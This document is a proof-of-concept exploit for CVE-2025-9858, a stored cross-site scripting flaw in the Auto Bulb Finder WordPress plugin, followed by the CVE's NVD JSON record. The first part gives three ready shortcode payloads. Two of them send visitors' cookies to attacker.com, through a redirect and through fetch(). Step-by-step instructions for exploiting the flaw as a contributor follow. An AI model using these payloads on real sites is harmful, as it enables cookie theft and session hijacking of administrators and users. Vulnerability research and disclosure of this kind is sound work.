CVE-2025-9858

<!-- CVE-2025-9858 PoC: Stored XSS via abf_vehicle shortcode --> <!-- Inject the following shortcode into a WordPress post or page as a contributor-level user --> <!-- Basic PoC: Cookie stealing via XSS --> [abf_vehicle model='" onmouseover="alert(document.cookie)" data-x="' year="2020"] <!-- Alternative PoC: Direct script injection via attribute --> [abf_vehicle model="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>" year="2020"] <!-- Advanced PoC: Event handler injection --> [abf_vehicle model='" onfocus="fetch(\'https://attacker.com/log?data=\'+document.cookie)" autofocus="' year="2020"] <!-- Exploitation steps: 1. Login to WordPress as a contributor or higher 2. Create a new post or page 3. Add the malicious shortcode to the content 4. Submit the post for review or publish (if permitted) 5. Once viewed by any user (including admins), the JavaScript executes 6. Attacker receives stolen cookies or performs actions on behalf of the victim --> <!-- Vulnerable file reference: plugins/trac/auto-bulb-finder-for-wp-wc/tags/2.8.0/includes/blocks/custom-block.php (Line 45) -->

{"cve": {"id": "CVE-2025-9858", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:49.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auto Bulb Finder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'abf_vehicle' shortcode in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/auto-bulb-finder-for-wp-wc/tags/2.8.0/includes/blocks/custom-block.php#L45", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414958%40auto-bulb-finder-for-wp-wc&new=3414958%40auto-bulb-finder-for-wp-wc&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c141af66-ebf6-4a80-8dfd-47a586342676?source=cve", "source": "[email protected]"}]}}